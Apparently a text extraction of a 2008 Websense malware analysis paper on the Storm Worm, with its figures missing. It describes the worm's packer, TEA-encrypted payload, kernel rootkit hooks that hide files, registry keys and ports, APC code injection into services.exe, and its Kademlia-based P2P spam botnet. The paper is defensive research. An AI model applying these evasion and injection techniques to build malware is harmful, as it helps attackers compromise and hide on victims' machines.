storm worm botnet analysis - june 2008

8/4/2019 Storm Worm Botnet Analysis - June 2008

1/26

Storm Worm & Botnet Analysis

Jun Zhang

Security Researcher, Websense Security Labs

June 2008


2/26

Websense Security Labs

Page 2 of 26

IntroductionThis month, we caught a new Worm/Trojan sample on ours labs. This worm uses email andvarious phishing Web sites to spread and infect computers. When the worm breaks into the system,

it installs a kernel driver to protect itself. With the help of the driver, it then injects and runsmalicious code from the legitimate process "services.exe". So, it can bypass firewalls easily andopen a back door for the bad guys.

This worm contains an SMTP client engine and a peer-to-peer client component. Obviously, thesecomponents are prepared for spamming or mass-mailing purposes.

During my research, I found that this worm used various rootkit techniques to protect itself (suchas hiding files, registers, ports, and the like), so it's not easily detected and removed. The wormalso used a custom packer and encryption to protect itself. In the driver that the worm dropped, we

learned that it employs a user-mode APC to inject malicious code (embedded) into the processnamed "services.exe".

In this paper, I will explain the worm from three aspects:1. The interesting things that reside in its executable file (custom packer and encryption)

2. Rootkit techniques it uses3. Peer-to-peer botnet & spamming

Okay, lets start our journey.

OverviewWhen this worm is running, it unpacks itself first, and then drops a malicious PE file that isembedded in theexecutable file. Then, it decrypts the malicious PE file into heap memory. When

these steps are complete, the worm jumps to the heap memory (containing the malicious PE file)and executes the decrypted malicious code. This is the code that is responsible for the badbehavior.

Figure 1 is a high-level view of this worm's activities:

Figure 1. Overview of the worm

Next, I will explain how this worm accomplishes all of this, step by step.


3/26


Page 3 of 26

Analysis sequenceThe worm uses a custom packer and encryption to protect its binary file, so the first step it takes isto unpack and decrypt the embedded PE file.

In this section, I will demonstrate how to use OllyDbg and IDA Pro to analyze the worm.

Dynamic AnalysisFirst, I use OllyDbg to debug the worm and try to dump the unpacked file.

Stage 1 Getting Start

Figure 2. Main Routine of the Worm

Notice that Figure 2 shows the main routine of the worm. It exports two functions: plr and wsx.The plr function is used to unpack worm-self, and wsx is the real entry point.

The plr function is passed to wsx as a parameter. This function implements the custom packerused by the worm.

Stage 2 Unpack

Figure 3. Calling Unpack Routine plr

After the execution path reaches the wsx function, the first thing it does is to unpack the datasection, which contains the code that will be executed further.


4/26


Page 4 of 26

Figure 4 shows the packed data section.

Figure 4. Packed Code

From Figure 4 we can see that this code does not have any actual functions and is used only toobscure its purpose.

The figure below shows the same data section after it has been unpacked:

Figure 5. Unpacked Code

Well, it looks very nice. At this moment, we can dump the memory to a file and do a staticanalysis (using IDA Pro or other tools). This is my favorite way, but we can continue debugging

this worm by OllyDbg and watch what it does next.

In the next section, I will use the IDA Pro tool to continue exploring the worm.


5/26


Page 5 of 26

Static AnalysisI am very grateful for IDA Pro, which is an amazing tool. With its help, we can search every

corner of the malware.

Stage 1 Decrypt & Decompress in heap memoryDuring the analysis, I found a TEA constant 0x9E3779B9 in the unpacked file, and after a short

analysis I was sure that this worm uses a TEA algorithm to encrypt the embedded malicious PEfile.

Figure 6. TEA Algorithm

Entire Decrypt & Decompress Routine:

Figure 7. Decrypt & Decompress in Heap memory

Stage 2 Jump to Heap MemoryFrom here, the worm has already expanded its payload (the malicious PE file) to heap memory,

and the last thing it does is to fix IAT and handle relocation.


6/26


Page 6 of 26

Figure 8. Fix IAT & Relocation

Assuming everything is okay, the worm jumps to the heap memory to execute the malicious PE

file. From that point forward, the worm can start breaking in to the system.

Figure 9. Jump to Heap to execute

Please compare Figure 9 with Figure 5, and note that they are the same. At this point, the

execution path expands to heap memory, and in there, the worm accomplishes its evil task.

Stage 3 Drop a driver & Start ServicesThe main purpose of the malicious PE file residing in the heap memory is to drop a driver and aP2P configuration file, and to start a Win32 service to load its driver.


7/26


Page 7 of 26

Drop the driver:

Figure 10. Release Driver

This driver contains another malicious PE file that has been encrypted. Well, this worm carried somany PE files; what a hard worker. In the next section, I will show the technique the worm uses toinject this PE file into a system process from its driver.


8/26


Page 8 of 26

Drop the P2P configuration file:

Figure 11. Release Configuration File

Contents of this configuration file:

The worm reads other bots' information from this configuration file, and then uses this informationto contact its brothers residing in the botnet.


9/26


Page 9 of 26

Start a Win32 service to load its driver

Figure 12. Install Service

Now the worm has broken into the system. Next, I will investigate the heavy weapon that thisworm uses to protect itself and bypass the firewall. This weapon is built from rootkit techniques,

so in the next section we will dive deep into the Windows kernel.


10/26


Page 10 of 26

The heavy weapon Driver (rootkit technique)

Figure 13. The workflow of the worm's driver

As we saw earlier, this worm drops two files: a driver named glok+.sys and a

peer-to-peer configuration file namedglok+serv.config

. In the end, the worm starts a Win32service to load its driver.

Normally, it is difficult to find these sorts of malicious behaviors, but by intercepting the API call,we locate them with ease.

API Calling

Figure 14. API Call

Win32 Service

Figure 15. Register Changes


11/26


Page 11 of 26

Worm's rootkit functionalityThe worm uses its driver to achieve the goals below:

1. Hide File (Avoid being deleted)2. Hide TCP Port (Bypass the firewall)3. Hide Win32 Service (Avoid being detected)

4. Inject Code to services.exe (Smart because it can easily bypass the ring3 detector)

1. Hide file or directoryThis worm hooks the native API named NtQueryDirectoryFile, so the worm can hide the file or

directory whose name contains the string glok+. Do you remember the name of its driver that Imentioned earlier? Yes, the name of the driver is glok+.sys; it contains the string

glok+.

Code slice HookNtQueryDirectoryFile:

Figure 16. Filter in NtQueryDirectoryFile

2. Hide Win32 ServiceAs we know, using the Win32 service to load the kernel driver will leave some footprint in the

register. So the worm hooks two register-related native APIs named NtEnumerateKey and

NtEnumerateValueKey; through them the worm can erase its footprint.

Code slice

Hook NtEnumerateKey:

Figure 17. Filter in NtEnumerateKey

Code slice Hook NtEnumerateValueKey:

Figure 18. Filter in NtEnumerateValueKey

3. Hide PortThis worm will send spam and connect to other bots that are in the botnet, so it must obscurenetwork-related things from everyone's eyes.

In the kernel, the worm searches the TCP device (Device\Tcp) and inline hooks its dispatch

function. When people try to query the network information, the worm hides itself from the resultof the query.

Inline hook TCP DeviceIoContorl functions:


12/26


Page 12 of 26

Set up a completion routine for each Irps

Code Slice - Hide Port:

4. Inject malicious PE toservices.exeThis worm does not use the normal way to inject the malicious code to other processes, such asthrough CreateRemoteThread. Instead, it does this from the kernel through a user-mode APC. Inthe injected code, the worm uses some shellcode techniques to locate the base address of

kernel32.dll and do API searching by itself.

The detailed steps are shown in Figure 13.


13/26


Page 13 of 26

Code slice: Using user-mode APC

Running in services.exeAs mentioned earlier, the injected code is responsible for initializing the bot and joining thebotnet.


14/26


Page 14 of 26

Locating kernel32 && Searching APIs often used by shellcode

Start main thread


15/26


Page 15 of 26

The super weapon P2P-based botnet

OverviewIn recent years, P2P technology has been used frequently in worms and has become more andmore popular. The P2P-based botnet is very hard to trace and to shut down, because the botnet hasrobust network connectivity, uses encryption, and controls traffic dispersion. Each bot influences

only a small part of the botnet, and upgrade/recovery is accomplished easily by its botmaster.

The botnet this worm constructed is a decentralized architecture, not like the traditional

peer-to-peer system. This kind of botnet does not need a central command and control location; itcan allow the attacker to upgrade/control infected hosts without the botmaster.

ImplementThis worm implements a distributed hash table based on the Kademlia algorithm and assigns arandom 128bit ID to each bot. The format of the information is similar to this:

Steps:1. Using the system time as a random seed.

2. Depending on the timing seed to generate the 128bit bot ID3. Randomly picking up the IP/UDP Port from a static array that was carried by itself4. Keeping a part of the bot information in the configuration file.

You can find these BotID from the P2P configuration file named glok+serv.config that isdropped by this worm. The contents of this file were described earlier.

An example of how to translate the BotID that is saved in glok+serv.config

Botnet Communication Analysis

Protocol AnalysisFor analyzing this worm's peer-to-peer and spamming functionality, I captured the packets froman infected computer. The statistics of the captured packets look like this:


16/26


Page 16 of 26

Protocol Hierarchy Statistics

From the statistics, we find that the main protocol this worm uses is UDP protocol; the worm alsouses SMTP protocol to send spam.

Protocol Port Type

Botnet Traffic Map

SpammingDepending on the built-in SMTP client, the worm can send spam through many free SMTPservers.


17/26


Page 17 of 26

TCP Connection with SMTP Server

When the worm is connected to other bots, it can get the latest instructions/upgrades, thendownload and run any files. During the analysis, I found that the worm could exchange the list ofSMTP servers with other bots. The contents of spam and adware are also exchanged from its

brothers.

The figure below shows the worm trying to connect to Google's SMTP server:

Well, it looks as if Google has improved the security of its SMTP server; the worm failed to

connect to it.

This is another SMTP server this worm is trying to connect with:


18/26


Page 18 of 26

Send Spam Through Google's SMTP Server

Send Spam Through thevideotron.ca SMTP Server

Some examples of spam sent by this worm:


19/26


Page 19 of 26

Another one:

Last one:


20/26


Page 20 of 26

Interacting with other botsI kept running this worm in a test environment and collected the packets it sent. By analyzing the

captured packets, I found that this worm interacted with more than 5796 infected hosts only in 21minutes! This evidence proves that the worm has already set up a large botnet!

To protect its botnet, the worm does not carry the entire list of bots, so that it can avoid exposing

the entire botnet from a single bot. It uses an XOR encryption algorithm to encrypt traffic, andrandomly assigns the UDP port for each bot, to improve the traffic dispersion. All of thesemethods highly enhance the security of the botnet.

UDP-based bots conversation

The conversation list is huge; the figure above shows only part of it. Each remote host in this list isinfected. The total number of bots I observed is 5746!


21/26


Page 21 of 26

UDP Port Distribution

Bot IP Distribution

Encryption of Network traffic between botsThis worm uses a special XOR algorithm to encrypt/decrypt the network traffic. Using this, theworm can avoid researchers who use network analyzers to study it.


22/26


Page 22 of 26

Code Slice - Encrypt/Decrypt UDP packet

C Code- Encrypt/Decryptalgorithm

This encryption algorithm is very simple, but good enough for bypassing IDS or IPS.

Botnet MessageWell, to work against this botnet, I wrote a tool to observe the traffic and analyze the messagesbetween the bots.


23/26


Page 23 of 26

Example: Searching other bots

Example: Reply message


24/26


25/26


Page 25 of 26

The huge botnet

ConclusionAnd that's all. From analyzing this worm, we notice that current malware looks more and morelike business software. Malicious footprints are less obvious today than those of malwareancestors. The traditional signature-based scan technology can barely detect today's bad stuff. Sothis is a challenge for all of us.

The purpose of most current malware is economic. The malicious author can derive financialbenefit from the spreading of the malware.

From the technology viewpoint, we find that some malware combines more than one malicioustechnique, and thus it has become more powerful.Is this a new stage in the evolution of malware?


26/26


Future WorkAs we saw, peer-to-peer botnets are more powerful and more efficient than traditional malware. Ithink the follow-on work will include a way of tracing peer-to-peer botnets and simulating their

results, to better study their resiliency.

Resources and References


[0] Do we protect against the storm worm

http://securitylabs.websense.com/content/Blogs/2797.aspx

[1] Storm Worm Chronology


[2] Halloween Storm


[3] New Storm tactic: Medical spam sites


[4] Analysis of Recent Storm Packerhttp://securitylabs.websense.com/content/Blogs/3083.aspx

[5] Unpacking Storm Worm: Code and Import Address Table onto the heap


Others

[6] http://en.wikipedia.org/wiki/Kademlia

[7] http://www.barsoom.org/~agthorr/papers/infocom-2006-kad.pdf

[8] http://xlattice.sourceforge.net/components/protocol/kademlia/specs.html

[9] The honeynet project - http://www.honeynet.org,February 2007.

[10] http://www.secureworks.com/research/threats/storm-worm/?threat=storm-worm

[11] http://noh.ucsd.edu/~bmenrigh/exposing_storm.ppt[12] http://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspx

[13] http://recon.cx/2008/a/pierre-marc_bureau/storm-recon.pdf
http://securitylabs.websense.com/content/Blogs/2797.aspxhttp://securitylabs.websense.com/content/Blogs/2822.aspxhttp://securitylabs.websense.com/content/Blogs/2855.aspxhttp://securitylabs.websense.com/content/Blogs/2902.aspxhttp://securitylabs.websense.com/content/Blogs/3083.aspxhttp://securitylabs.websense.com/content/Blogs/3127.aspxhttp://en.wikipedia.org/wiki/Kademliahttp://www.barsoom.org/~agthorr/papers/infocom-2006-kad.pdfhttp://xlattice.sourceforge.net/components/protocol/kademlia/specs.htmlhttp://www.honeynet.org%2Cfebruary/http://www.secureworks.com/research/threats/storm-worm/?threat=storm-wormhttp://noh.ucsd.edu/~bmenrigh/exposing_storm.ppthttp://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspxhttp://recon.cx/2008/a/pierre-marc_bureau/storm-recon.pdfhttp://recon.cx/2008/a/pierre-marc_bureau/storm-recon.pdfhttp://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspxhttp://noh.ucsd.edu/~bmenrigh/exposing_storm.ppthttp://www.secureworks.com/research/threats/storm-worm/?threat=storm-wormhttp://www.honeynet.org%2Cfebruary/http://xlattice.sourceforge.net/components/protocol/kademlia/specs.htmlhttp://www.barsoom.org/~agthorr/papers/infocom-2006-kad.pdfhttp://en.wikipedia.org/wiki/Kademliahttp://securitylabs.websense.com/content/Blogs/3127.aspxhttp://securitylabs.websense.com/content/Blogs/3083.aspxhttp://securitylabs.websense.com/content/Blogs/2902.aspxhttp://securitylabs.websense.com/content/Blogs/2855.aspxhttp://securitylabs.websense.com/content/Blogs/2822.aspxhttp://securitylabs.websense.com/content/Blogs/2797.aspx

storm worm botnet analysis - june 2008

Documents